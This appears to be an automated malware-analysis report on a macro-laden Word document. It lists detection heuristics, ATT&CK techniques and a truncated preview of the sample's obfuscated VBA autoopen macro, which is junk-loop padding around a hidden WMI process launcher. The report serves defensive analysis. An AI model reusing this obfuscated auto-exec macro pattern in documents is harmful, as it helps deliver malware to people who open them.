Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1137.001 Office Application Startup: Office Test Scripts
The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the use of WMI to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics (8)
- ClamAV: Doc.Malware.00536d-6937584-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6937584-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38923 bytes |

SHA-256 of macros.bas: 87a21b2626eed3b43c3d81d457e96746ed9034c71f22ec4d01c3497f64219841
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Z4AxBUc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jx4Zc_U"
Attribute VB_Base = "0{103C49B8-CDD4-4761-8662-1EFAF30F852B}{FE5D26C4-8E51-4B39-AC38-D33FFB7A4504}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wAAGUck"
Attribute VB_Base = "0{53B6AC09-460C-4DD2-9130-82F9FDFEB4A9}{00D347EF-3C70-4BB3-853B-FD2C9D3A214A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "QAkGXwQ"
Sub autoopen()
If EQ_UQ_C = Nk4wAA Then
Do While jAUBD_QB And IABDX_D
While OABA4U And 64732849
oAAAA4k = Asc(950034646 / Oct(531804896))
Wend
For RCBAcAZU = 172177485 To 951924674
wcADAA = 99237868
Next
Set wkAUBQ = wwCQAU
If hGAoGDA Eqv 642833417 Then
h_QAAAkC = CDate(ZwUAAAXU)
End If
While I1_AUA1 < dGAC4oA
EZAo1ZBA = (IZAU_kA)
Wend
Loop
End If
If OQ1BQAAA = cGGAZZ Then
Do While ocAAGD And kAUA4A
While jUZQAk And 887881186
ADAAkXoG = Asc(597044215 / Oct(411318129))
Wend
For sBX4UAUo = 372831526 To 729711231
bckcG_A = 78672383
Next
Set iAZcBwQD = WDQQAX
If IX11wkA Eqv 118078820 Then
AAQQCDXA = CDate(I_DcADX)
End If
While iGZkAA < UQUA_AA
NAAUDoAo = (s1QAAZA_)
Wend
Loop
End If
p_1DGA
If JkUBC1x = dU1kAZA Then
Do While M1D1BU_ And UAACAAGU
While bAUAkDA And 984689681
wAUAZkX = Asc(334995197 / Oct(897233447))
Wend
For FXDAAA = 602540804 To 964581166
nwA1kBQ = 941713516
Next
Set VxwCBAc_ = RZcxAk
If qAAxZk Eqv 224799144 Then
SU1AUCZ = CDate(wUAAAA)
End If
While EAAoBcAA < RUQDUc
EAQCQZD = (hAQA1G)
Wend
Loop
End If
If v14QxBA = NkAGoC_D Then
Do While MC_AUwG And WB4QkZ
While AUkk_QA And 609792284
IUc_AABU = Asc(421335260 / Oct(437109608))
Wend
For dAckDk = 660095315 To 340121662
mZ_GoA = 758445518
Next
Set KX_QwwCU = lAUcABAA
If jCoDcA Eqv 487373023 Then
vBAcUAxD = CDate(uUUBUcDA)
End If
While qDkU1kA < cBAC4oD
zAAAxU = (uD_Do4cD)
Wend
Loop
End If
If SXGUAD = uAZAB1 Then
Do While a4DAAA4B And JoAkAAQC
While hAXUUAwU And 534573086
aAZoUAo = Asc(669997128 / Oct(709023313))
Wend
For qAABUQUA = 514942717 To 603920911
S_UUkxU = 912727991
Next
Set TGAAwAAG = GBwAQk
If zDAAAck Eqv 427663115 Then
oA1A_xo = CDate(tBQABA)
End If
While bw_4c1C < b_AAGA
uAx_DwAQ = (uXCA41Z4)
Wend
Loop
End If
End Sub
Attribute VB_Name = "LU4xGUA"
Function p_1DGA()
On Error Resume Next
If XAAcAADG = dAAAx_ Then
Do While V4xQAX4X And RAXCADAw
While MokoBZ And 148684133
zAADAAQA = Asc(665758444 / Oct(655490864))
Wend
For X4XAUD4 = 723080684 To 878588818
LAQQZkAA = 31076117
Next
Set EAx1DA = jBAoQ1A
If VQAAoAk Eqv 543730137 Then
PQAACU = CDate(GAkU_4A)
End If
While wCAAB4 < ZDXwxo
sBGCG1 = (mQXDUDA)
Wend
Loop
End If
If uc1_kDQ = IcABABCU Then
Do While nAwA_BAQ And ikQAXG
While PcA1XQZk And 771568086
tUAQDU = Asc(934442094 / Oct(684405984))
Wend
For fAA_QDAA = 133477167 To 381864372
CUwA_AA1 = 354283342
Next
Set RXUADAXA = DGXABUU
If hXADGAQ Eqv 358754312 Then
... (truncated)